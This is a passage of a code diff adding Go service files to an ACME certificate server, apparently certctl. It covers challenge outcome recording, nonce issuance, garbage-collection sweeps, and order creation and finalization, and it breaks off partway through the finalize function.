|
return nil, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Submit to the pool. The onComplete callback persists the final
|
||||||
|
// challenge status + cascades the parent authz status. We detach
|
||||||
|
// from the request context via context.WithoutCancel so the
|
||||||
|
// callback's WithinTx survives the HTTP handler returning, while
|
||||||
|
// preserving inherited values (logger, trace IDs, audit actor).
|
||||||
|
bgctx := context.WithoutCancel(ctx)
|
||||||
|
chSnapshot := *ch
|
||||||
|
authzSnapshot := *authz
|
||||||
|
identifier := authz.Identifier.Value
|
||||||
|
s.validatorPool.Submit(bgctx, string(ch.Type), identifier, ch.Token, expected, func(verr error) {
|
||||||
|
s.recordChallengeOutcome(bgctx, accountID, &chSnapshot, &authzSnapshot, verr)
|
||||||
|
})
|
||||||
|
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeRespondTotal)
|
||||||
|
return ch, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// recordChallengeOutcome is the validator-pool callback. Persists the
|
||||||
|
// challenge's final status + cascades the parent authz status.
|
||||||
|
//
|
||||||
|
// Authz cascade: if the challenge succeeded, the authz becomes valid
|
||||||
|
// (RFC 8555 §7.1.6: any one challenge passing makes the authz valid).
|
||||||
|
// If the challenge failed, the authz becomes invalid only if no other
|
||||||
|
// pending challenges remain (Phase 3 minimal-viable path: we mark the
|
||||||
|
// authz invalid on first failure since Phase 3 emits 1 challenge per
|
||||||
|
// authz; Phase 4+ extending to multi-challenge-per-authz revisits this).
|
||||||
|
func (s *ACMEService) recordChallengeOutcome(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID string,
|
||||||
|
ch *domain.ACMEChallenge,
|
||||||
|
authz *domain.ACMEAuthorization,
|
||||||
|
verr error,
|
||||||
|
) {
|
||||||
|
now := time.Now().UTC()
|
||||||
|
var newAuthzStatus domain.ACMEAuthzStatus
|
||||||
|
if verr == nil {
|
||||||
|
ch.Status = domain.ACMEChallengeStatusValid
|
||||||
|
ch.ValidatedAt = &now
|
||||||
|
ch.Error = nil
|
||||||
|
newAuthzStatus = domain.ACMEAuthzStatusValid
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeValidateValid)
|
||||||
|
} else {
|
||||||
|
ch.Status = domain.ACMEChallengeStatusInvalid
|
||||||
|
if p := acme.ChallengeProblemFromError(string(ch.Type), verr); p != nil {
|
||||||
|
ch.Error = &domain.ACMEProblem{
|
||||||
|
Type: p.Type,
|
||||||
|
Detail: p.Detail,
|
||||||
|
Status: p.Status,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
newAuthzStatus = domain.ACMEAuthzStatusInvalid
|
||||||
|
s.metrics.bump(&s.metrics.ChallengeValidateInvalid)
|
||||||
|
}
|
||||||
|
|
||||||
|
auditDetails := map[string]interface{}{
|
||||||
|
"authz_id": ch.AuthzID,
|
||||||
|
"type": string(ch.Type),
|
||||||
|
"identifier": authz.Identifier.Value,
|
||||||
|
"valid": verr == nil,
|
||||||
|
}
|
||||||
|
if verr != nil {
|
||||||
|
auditDetails["error"] = verr.Error()
|
||||||
|
}
|
||||||
|
|
||||||
|
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.UpdateChallengeWithTx(ctx, q, ch); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if err := s.repo.UpdateAuthzStatusWithTx(ctx, q, ch.AuthzID, newAuthzStatus); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
// Cascade: if the authz turned valid, see whether the order's
|
||||||
|
// authzs are now ALL valid; flip order to ready if so.
|
||||||
|
// Read-after-write to confirm.
|
||||||
|
authzs, err := s.repo.ListAuthzsByOrder(ctx, authz.OrderID)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
allValid := len(authzs) > 0
|
||||||
|
anyInvalid := false
|
||||||
|
for _, a := range authzs {
|
||||||
|
if a.AuthzID == ch.AuthzID {
|
||||||
|
if newAuthzStatus != domain.ACMEAuthzStatusValid {
|
||||||
|
allValid = false
|
||||||
|
}
|
||||||
|
if newAuthzStatus == domain.ACMEAuthzStatusInvalid {
|
||||||
|
anyInvalid = true
|
||||||
|
}
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
if a.Status != domain.ACMEAuthzStatusValid {
|
||||||
|
allValid = false
|
||||||
|
}
|
||||||
|
if a.Status == domain.ACMEAuthzStatusInvalid {
|
||||||
|
anyInvalid = true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
order, err := s.repo.GetOrderByID(ctx, authz.OrderID)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
switch {
|
||||||
|
case allValid && order.Status == domain.ACMEOrderStatusPending:
|
||||||
|
order.Status = domain.ACMEOrderStatusReady
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
case anyInvalid && order.Status == domain.ACMEOrderStatusPending:
|
||||||
|
order.Status = domain.ACMEOrderStatusInvalid
|
||||||
|
order.Error = &domain.ACMEProblem{
|
||||||
|
Type: "urn:ietf:params:acme:error:incorrectResponse",
|
||||||
|
Detail: "one or more authorizations failed",
|
||||||
|
Status: 403,
|
||||||
|
}
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
||||||
|
"acme_challenge_completed", "acme_challenge", ch.ChallengeID,
|
||||||
|
auditDetails)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,74 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
"sync/atomic"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern.
|
||||||
|
// Package stays `service`; every external caller of
|
||||||
|
// `service.ACMEService.GarbageCollect(...)` resolves the same way —
|
||||||
|
// pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the Phase 5 ACME GC sweep concern: the scheduler-
|
||||||
|
// invoked GarbageCollect entry point plus the atomicAddUint64
|
||||||
|
// counter helper (only consumed inside the sweep body for the
|
||||||
|
// rows-affected-N case the default `bump` doesn't cover).
|
||||||
|
|
||||||
|
// GarbageCollect runs a single ACME GC sweep. Phase 5 — the scheduler
|
||||||
|
// invokes this every cfg.GCInterval. Three independent sweeps:
|
||||||
|
//
|
||||||
|
// 1. Delete used / expired nonces.
|
||||||
|
// 2. Transition expired pending authzs to `expired`.
|
||||||
|
// 3. Transition expired pending/ready/processing orders to `invalid`.
|
||||||
|
//
|
||||||
|
// Each sweep is a single SQL statement (no per-row transactions) so a
|
||||||
|
// large reap is one atomic write per sweep. Per-sweep errors are
|
||||||
|
// logged-and-continued: a failing nonces sweep doesn't block the
|
||||||
|
// authzs sweep. Returns the first error encountered (for caller
|
||||||
|
// telemetry); per-sweep counts are recorded on metrics regardless.
|
||||||
|
//
|
||||||
|
// Idempotent — repeated runs are safe; the second run finds 0 rows.
|
||||||
|
func (s *ACMEService) GarbageCollect(ctx context.Context) error {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunsTotal)
|
||||||
|
var firstErr error
|
||||||
|
|
||||||
|
if n, err := s.repo.GCExpiredNonces(ctx); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
||||||
|
if firstErr == nil {
|
||||||
|
firstErr = fmt.Errorf("acme gc: nonces: %w", err)
|
||||||
|
}
|
||||||
|
} else if n > 0 {
|
||||||
|
atomicAddUint64(&s.metrics.GCNoncesReapedTotal, uint64(n))
|
||||||
|
}
|
||||||
|
|
||||||
|
if n, err := s.repo.GCExpireAuthorizations(ctx); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
||||||
|
if firstErr == nil {
|
||||||
|
firstErr = fmt.Errorf("acme gc: authzs: %w", err)
|
||||||
|
}
|
||||||
|
} else if n > 0 {
|
||||||
|
atomicAddUint64(&s.metrics.GCAuthzsExpiredTotal, uint64(n))
|
||||||
|
}
|
||||||
|
|
||||||
|
if n, err := s.repo.GCInvalidateExpiredOrders(ctx); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.GCRunFailuresTotal)
|
||||||
|
if firstErr == nil {
|
||||||
|
firstErr = fmt.Errorf("acme gc: orders: %w", err)
|
||||||
|
}
|
||||||
|
} else if n > 0 {
|
||||||
|
atomicAddUint64(&s.metrics.GCOrdersInvalidatedTotal, uint64(n))
|
||||||
|
}
|
||||||
|
|
||||||
|
return firstErr
|
||||||
|
}
|
||||||
|
|
||||||
|
// atomicAddUint64 adds delta to the counter. The metrics struct exposes
|
||||||
|
// only `bump` (add 1) by default; this helper covers the
|
||||||
|
// rows-affected-N case the GC needs.
|
||||||
|
func atomicAddUint64(c *atomic.Uint64, delta uint64) { c.Add(delta) }
|
||||||
@@ -0,0 +1,46 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"fmt"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/acme"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9 (2026-05-14): extracted from
|
||||||
|
// internal/service/acme.go via the Option B sibling-file pattern
|
||||||
|
// (operator's choice post-Sprint-8). Package stays `service`; every
|
||||||
|
// external caller of `service.ACMEService.IssueNonce(...)` resolves
|
||||||
|
// the same way — pure mechanical relocation.
|
||||||
|
//
|
||||||
|
// This file holds the SERVER-issues-nonce concern: the IssueNonce
|
||||||
|
// method that generates + persists a fresh ACME nonce for the
|
||||||
|
// Replay-Nonce header per RFC 8555 §6.5. The nonceAdapter type
|
||||||
|
// (which wraps ACMERepo.ConsumeNonce for the JWS verifier) stays
|
||||||
|
// in acme.go alongside VerifyJWS — it's a verification-infrastructure
|
||||||
|
// helper, not a server-side nonce concern.
|
||||||
|
|
||||||
|
// IssueNonce generates a fresh ACME nonce, persists it with the
|
||||||
|
// configured TTL, and returns the encoded string for the
|
||||||
|
// Replay-Nonce header.
|
||||||
|
//
|
||||||
|
// RFC 8555 §6.5: every successful ACME response carries a
|
||||||
|
// Replay-Nonce. Phase 1a wires this via the directory + new-nonce
|
||||||
|
// handlers; Phase 1b extends with new-account + account/<id> POST
|
||||||
|
// responses (the JWS-authenticated paths).
|
||||||
|
func (s *ACMEService) IssueNonce(ctx context.Context) (string, error) {
|
||||||
|
nonce, err := acme.GenerateNonce()
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: generate nonce: %w", err)
|
||||||
|
}
|
||||||
|
if err := s.repo.IssueNonce(ctx, nonce, s.cfg.NonceTTL); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewNonceFailureTotal)
|
||||||
|
return "", fmt.Errorf("acme: persist nonce: %w", err)
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.NewNonceTotal)
|
||||||
|
return nonce, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,540 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package service
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
cryptorand "crypto/rand"
|
||||||
|
"crypto/x509"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/certctl-io/certctl/internal/api/acme"
|
||||||
|
"github.com/certctl-io/certctl/internal/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 9b (2026-05-14): the deferred half of
|
||||||
|
// Sprint 9. Extracted from internal/service/acme.go via the Option B
|
||||||
|
// sibling-file pattern. Package stays `service`; every external caller
|
||||||
|
// of `service.ACMEService.{CreateOrder,LookupOrder,FinalizeOrder,
|
||||||
|
// LookupCertificate}` resolves the same way — pure mechanical
|
||||||
|
// relocation.
|
||||||
|
//
|
||||||
|
// What lives here
|
||||||
|
// ===============
|
||||||
|
// The Phase 2 orders concern in full: the order CRUD methods
|
||||||
|
// (CreateOrder + LookupOrder + FinalizeOrder + LookupCertificate),
|
||||||
|
// the FinalizeOrderResult shape, the order-scoped accountOwnsACMECert
|
||||||
|
// ownership check, and the three orders-internal ID helpers
|
||||||
|
// (randIDSuffix + base32encode for generating acme-ord-* / acme-authz-* /
|
||||||
|
// acme-chall-* / mc-acme-* prefixes per the project's TEXT-primary-keys
|
||||||
|
// architecture decision; identifierStrings for audit detail rendering).
|
||||||
|
//
|
||||||
|
// What stays in acme.go (cross-concern by helper-call analysis)
|
||||||
|
// =============================================================
|
||||||
|
// firstAvailableIssuer remains in acme.go. Three call sites consume
|
||||||
|
// it: FinalizeOrder (here in acme_orders.go) AND Phase 4 RevokeCert
|
||||||
|
// + RenewalInfo (both in acme.go). Moving it here would leave Phase 4
|
||||||
|
// reaching across a sibling-file boundary for a single helper; leaving
|
||||||
|
// it in acme.go keeps it adjacent to its other two callers while still
|
||||||
|
// staying reachable from this file via Go's same-package scope. The
|
||||||
|
// alternative (a third "shared helpers" sibling) costs an extra file
|
||||||
|
// for one helper — not worth the indirection.
|
||||||
|
//
|
||||||
|
// mapACMERevocationReason stays in acme.go too. It's used exclusively
|
||||||
|
// by Phase 4 RevokeCert. Despite sitting in the orders helper cluster
|
||||||
|
// in audit notes (because of its alphabetical-adjacency to the other
|
||||||
|
// helpers in the audit-time grep), the actual call graph puts it
|
||||||
|
// firmly on the Phase 4 side.
|
||||||
|
//
|
||||||
|
// Sprint 9 vs Sprint 9b
|
||||||
|
// =====================
|
||||||
|
// Sprint 9 (commit b503d27b) shipped nonces + authz + challenges + gc
|
||||||
|
// — four files, 432 LOC moved, all single-contiguous-region cuts.
|
||||||
|
// Sprint 9b crosses the harder boundary the original sprint deferred:
|
||||||
|
// a ~476-LOC two-block cut (orders block A + helpers block B with
|
||||||
|
// firstAvailableIssuer's 14 lines between them staying behind) plus
|
||||||
|
// the per-helper move-vs-stay decision documented above. Splitting
|
||||||
|
// 9 from 9b keeps the four contiguous cuts on one commit and the
|
||||||
|
// non-contiguous cut on its own, mirroring the Sprint 8 / Sprint 8b
|
||||||
|
// pattern (mechanical vs harder-shape, separate review windows).
|
||||||
|
|
||||||
|
// --- Phase 2 — orders + authz + finalize + cert download ---------------
|
||||||
|
|
||||||
|
// CreateOrder validates a new-order request against the bound profile
|
||||||
|
// and persists the order + per-identifier authz + per-authz challenge
|
||||||
|
// rows in one WithinTx. Returns the created order on success.
|
||||||
|
//
|
||||||
|
// Auth-mode dispatch:
|
||||||
|
// - trust_authenticated (default): order goes immediately to status=ready,
|
||||||
|
// each authz immediately to status=valid (no challenge validation
|
||||||
|
// required); a single placeholder http-01 challenge per authz is
|
||||||
|
// persisted with status=valid for RFC 8555 compliance (the spec
|
||||||
|
// requires challenges on every authz).
|
||||||
|
// - challenge: order stays at status=pending, authzs at status=pending,
|
||||||
|
// challenges at status=pending, until Phase 3's validators run.
|
||||||
|
func (s *ACMEService) CreateOrder(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID, profileID string,
|
||||||
|
identifiers []domain.ACMEIdentifier,
|
||||||
|
notBefore, notAfter *time.Time,
|
||||||
|
) (*domain.ACMEOrder, error) {
|
||||||
|
if s.tx == nil || s.auditService == nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: new-order requires SetTransactor + SetAuditService")
|
||||||
|
}
|
||||||
|
// Phase 5 — per-account orders/hour cap. Hits return rateLimited
|
||||||
|
// (RFC 8555 §6.7) before any DB work. Counter is in-memory; restart
|
||||||
|
// wipes (eventual-consistency caps are acceptable).
|
||||||
|
if s.rateLimiter != nil && s.cfg.RateLimitOrdersPerHour > 0 {
|
||||||
|
if !s.rateLimiter.Allow(acme.ActionNewOrder, accountID, s.cfg.RateLimitOrdersPerHour) {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, ErrACMERateLimited
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Phase 5 — concurrent-orders cap. We count
|
||||||
|
// pending/ready/processing orders for this account; if at-or-over
|
||||||
|
// the cap, reject. This is a DB read (no FOR UPDATE), so two
|
||||||
|
// requests racing under the threshold can both succeed and push
|
||||||
|
// the account one over — accepted as eventual-consistency.
|
||||||
|
if s.cfg.RateLimitConcurrentOrders > 0 {
|
||||||
|
count, cerr := s.repo.CountActiveOrdersByAccount(ctx, accountID)
|
||||||
|
if cerr == nil && count >= s.cfg.RateLimitConcurrentOrders {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, ErrACMEConcurrentOrdersExceeded
|
||||||
|
}
|
||||||
|
}
|
||||||
|
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
||||||
|
}
|
||||||
|
authMode := profile.ACMEAuthMode
|
||||||
|
if authMode == "" {
|
||||||
|
authMode = string(s.cfg.DefaultAuthMode)
|
||||||
|
}
|
||||||
|
if authMode == "" {
|
||||||
|
authMode = "trust_authenticated"
|
||||||
|
}
|
||||||
|
if authMode != "trust_authenticated" && authMode != "challenge" {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("%w: %q", ErrACMEUnsupportedAuthMode, authMode)
|
||||||
|
}
|
||||||
|
|
||||||
|
now := time.Now().UTC()
|
||||||
|
orderTTL := s.cfg.OrderTTL
|
||||||
|
if orderTTL <= 0 {
|
||||||
|
orderTTL = 24 * time.Hour
|
||||||
|
}
|
||||||
|
authzTTL := s.cfg.AuthzTTL
|
||||||
|
if authzTTL <= 0 {
|
||||||
|
authzTTL = 24 * time.Hour
|
||||||
|
}
|
||||||
|
|
||||||
|
// In trust_authenticated mode, the order goes straight to `ready`
|
||||||
|
// (RFC 8555 §7.1.6: ready means all authzs valid, awaiting CSR).
|
||||||
|
// In challenge mode, the order stays `pending` until challenges
|
||||||
|
// validate.
|
||||||
|
orderStatus := domain.ACMEOrderStatusPending
|
||||||
|
authzStatus := domain.ACMEAuthzStatusPending
|
||||||
|
challengeStatus := domain.ACMEChallengeStatusPending
|
||||||
|
if authMode == "trust_authenticated" {
|
||||||
|
orderStatus = domain.ACMEOrderStatusReady
|
||||||
|
authzStatus = domain.ACMEAuthzStatusValid
|
||||||
|
challengeStatus = domain.ACMEChallengeStatusValid
|
||||||
|
}
|
||||||
|
|
||||||
|
order := &domain.ACMEOrder{
|
||||||
|
OrderID: "acme-ord-" + randIDSuffix(),
|
||||||
|
AccountID: accountID,
|
||||||
|
Identifiers: identifiers,
|
||||||
|
Status: orderStatus,
|
||||||
|
ExpiresAt: now.Add(orderTTL),
|
||||||
|
NotBefore: notBefore,
|
||||||
|
NotAfter: notAfter,
|
||||||
|
CreatedAt: now,
|
||||||
|
UpdatedAt: now,
|
||||||
|
}
|
||||||
|
|
||||||
|
auditDetails := map[string]interface{}{
|
||||||
|
"account_id": accountID,
|
||||||
|
"profile_id": resolvedProfileID,
|
||||||
|
"auth_mode": authMode,
|
||||||
|
"identifier_n": len(identifiers),
|
||||||
|
"identifiers": identifierStrings(identifiers),
|
||||||
|
}
|
||||||
|
|
||||||
|
err = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.CreateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return fmt.Errorf("acme: create order: %w", err)
|
||||||
|
}
|
||||||
|
// Per-identifier authz + 1 placeholder challenge per authz.
|
||||||
|
for _, id := range identifiers {
|
||||||
|
authz := &domain.ACMEAuthorization{
|
||||||
|
AuthzID: "acme-authz-" + randIDSuffix(),
|
||||||
|
OrderID: order.OrderID,
|
||||||
|
Identifier: id,
|
||||||
|
Status: authzStatus,
|
||||||
|
ExpiresAt: now.Add(authzTTL),
|
||||||
|
Wildcard: strings.HasPrefix(id.Value, "*."),
|
||||||
|
CreatedAt: now,
|
||||||
|
UpdatedAt: now,
|
||||||
|
}
|
||||||
|
if err := s.repo.CreateAuthzWithTx(ctx, q, authz); err != nil {
|
||||||
|
return fmt.Errorf("acme: create authz: %w", err)
|
||||||
|
}
|
||||||
|
// RFC 8555 §8: every authz needs at least one challenge
|
||||||
|
// row. Phase 2 emits a single http-01 placeholder; Phase 3
|
||||||
|
// will fan out to all 3 challenge types under challenge mode.
|
||||||
|
ch := &domain.ACMEChallenge{
|
||||||
|
ChallengeID: "acme-chall-" + randIDSuffix(),
|
||||||
|
AuthzID: authz.AuthzID,
|
||||||
|
Type: domain.ACMEChallengeTypeHTTP01,
|
||||||
|
Status: challengeStatus,
|
||||||
|
Token: randIDSuffix(),
|
||||||
|
CreatedAt: now,
|
||||||
|
}
|
||||||
|
if challengeStatus == domain.ACMEChallengeStatusValid {
|
||||||
|
validatedAt := now
|
||||||
|
ch.ValidatedAt = &validatedAt
|
||||||
|
}
|
||||||
|
if err := s.repo.CreateChallengeWithTx(ctx, q, ch); err != nil {
|
||||||
|
return fmt.Errorf("acme: create challenge: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(
|
||||||
|
ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID),
|
||||||
|
domain.ActorTypeUser,
|
||||||
|
"acme_order_created",
|
||||||
|
"acme_order",
|
||||||
|
order.OrderID,
|
||||||
|
auditDetails,
|
||||||
|
)
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
s.metrics.bump(&s.metrics.NewOrderTotal)
|
||||||
|
return order, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// LookupOrder returns an order by ID, asserting the requesting
|
||||||
|
// account owns it. ErrACMEOrderUnauthorized when account_id mismatches.
|
||||||
|
func (s *ACMEService) LookupOrder(ctx context.Context, orderID, accountID string) (*domain.ACMEOrder, error) {
|
||||||
|
order, err := s.repo.GetOrderByID(ctx, orderID)
|
||||||
|
if err != nil {
|
||||||
|
if errors.Is(err, repository.ErrNotFound) {
|
||||||
|
return nil, ErrACMEOrderNotFound
|
||||||
|
}
|
||||||
|
return nil, fmt.Errorf("acme: lookup order: %w", err)
|
||||||
|
}
|
||||||
|
if order.AccountID != accountID {
|
||||||
|
return nil, ErrACMEOrderUnauthorized
|
||||||
|
}
|
||||||
|
return order, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// FinalizeOrderResult bundles the post-finalize state the handler
|
||||||
|
// needs: the updated order + the cert ID for the cert-download URL.
|
||||||
|
type FinalizeOrderResult struct {
|
||||||
|
Order *domain.ACMEOrder
|
||||||
|
CertID string
|
||||||
|
}
|
||||||
|
|
||||||
|
// FinalizeOrder consumes a CSR, asserts it matches the order's
|
||||||
|
// identifiers, issues via the IssuerRegistry's per-profile connector,
|
||||||
|
// persists the managed_certificates row + version + audit, and
|
||||||
|
// transitions the order to status=valid with certificate_id set.
|
||||||
|
//
|
||||||
|
// Atomicity boundary (documented in the master prompt):
|
||||||
|
// - Step A (this function's own WithinTx): order status pending →
|
||||||
|
// processing + audit row.
|
||||||
|
// - Step B (CertificateService.Create): managed_certificates row +
|
||||||
|
// audit row in its own WithinTx.
|
||||||
|
// - Step C (this function's own WithinTx): certificate_versions row
|
||||||
|
// - order status processing → valid + certificate_id + csr_pem +
|
||||||
|
// audit row.
|
||||||
|
//
|
||||||
|
// The window between Step B and Step C can leave a managed_certificates
|
||||||
|
// row whose order is still in `processing`. Phase 5's GC scheduler
|
||||||
|
// reconciles. Documented in the project's ACME-server design notes + the
|
||||||
|
// service file's design notes.
|
||||||
|
func (s *ACMEService) FinalizeOrder(
|
||||||
|
ctx context.Context,
|
||||||
|
accountID, orderID, profileID string,
|
||||||
|
csr *x509.CertificateRequest,
|
||||||
|
csrPEM string,
|
||||||
|
) (*FinalizeOrderResult, error) {
|
||||||
|
if s.certService == nil || s.certRepo == nil || s.issuerRegistry == nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, ErrACMEFinalizeUnconfigured
|
||||||
|
}
|
||||||
|
if s.tx == nil || s.auditService == nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: finalize requires SetTransactor + SetAuditService")
|
||||||
|
}
|
||||||
|
|
||||||
|
order, err := s.LookupOrder(ctx, orderID, accountID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
if order.Status != domain.ACMEOrderStatusReady && order.Status != domain.ACMEOrderStatusProcessing {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("%w: status=%s", ErrACMEOrderNotReady, order.Status)
|
||||||
|
}
|
||||||
|
// Idempotent re-finalize (RFC 8555 §7.4): if the order is already
|
||||||
|
// valid, return the existing result.
|
||||||
|
if order.Status == domain.ACMEOrderStatusValid && order.CertificateID != "" {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderTotal)
|
||||||
|
return &FinalizeOrderResult{Order: order, CertID: order.CertificateID}, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Validate CSR matches order identifiers.
|
||||||
|
if p := acme.CSRMatchesIdentifiers(csr, order.Identifiers); p != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
// Persist the failure on the order for client visibility.
|
||||||
|
order.Status = domain.ACMEOrderStatusInvalid
|
||||||
|
order.Error = &domain.ACMEProblem{Type: p.Type, Detail: p.Detail, Status: p.Status}
|
||||||
|
_ = s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
return s.repo.UpdateOrderWithTx(ctx, q, order)
|
||||||
|
})
|
||||||
|
return nil, fmt.Errorf("acme: csr mismatch: %s", p.Detail)
|
||||||
|
}
|
||||||
|
|
||||||
|
resolvedProfileID, err := s.resolveProfile(ctx, profileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
profile, err := s.profiles.Get(ctx, resolvedProfileID)
|
||||||
|
if err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: lookup profile: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step A: mark order processing.
|
||||||
|
order.Status = domain.ACMEOrderStatusProcessing
|
||||||
|
if err := s.tx.WithinTx(ctx, func(q repository.Querier) error {
|
||||||
|
if err := s.repo.UpdateOrderWithTx(ctx, q, order); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
return s.auditService.RecordEventWithTx(ctx, q,
|
||||||
|
fmt.Sprintf("acme:%s", accountID), domain.ActorTypeUser,
|
||||||
|
"acme_order_processing", "acme_order", order.OrderID,
|
||||||
|
map[string]interface{}{"profile_id": resolvedProfileID})
|
||||||
|
}); err != nil {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step B: issue the cert via the per-issuer connector + persist
|
||||||
|
// the managed_certificates row.
|
||||||
|
commonName := csr.Subject.CommonName
|
||||||
|
if commonName == "" && len(order.Identifiers) > 0 {
|
||||||
|
commonName = order.Identifiers[0].Value
|
||||||
|
}
|
||||||
|
sans := make([]string, 0, len(order.Identifiers))
|
||||||
|
for _, id := range order.Identifiers {
|
||||||
|
if id.Type == "dns" {
|
||||||
|
sans = append(sans, id.Value)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// Resolve the bound issuer. Profile carries no IssuerID column
|
||||||
|
// (issuer is per-issuance per certctl architecture), so we'd
|
||||||
|
// normally get it from the order context. For Phase 2 we use the
|
||||||
|
// configured default issuer-id for the first registered connector.
|
||||||
|
// Operators with multiple profiles + multiple issuers will refine
|
||||||
|
// this in a follow-up.
|
||||||
|
issuerID, conn, ok := s.firstAvailableIssuer()
|
||||||
|
if !ok {
|
||||||
|
s.metrics.bump(&s.metrics.FinalizeOrderFailureTotal)
|
||||||
|
return nil, fmt.Errorf("acme: no issuer available in registry")
|
||||||
|
}
|
||||||
|
maxTTL := profile.MaxTTLSeconds
|
||||||
|
mustStaple := profile.MustStaple
|
||||||
|
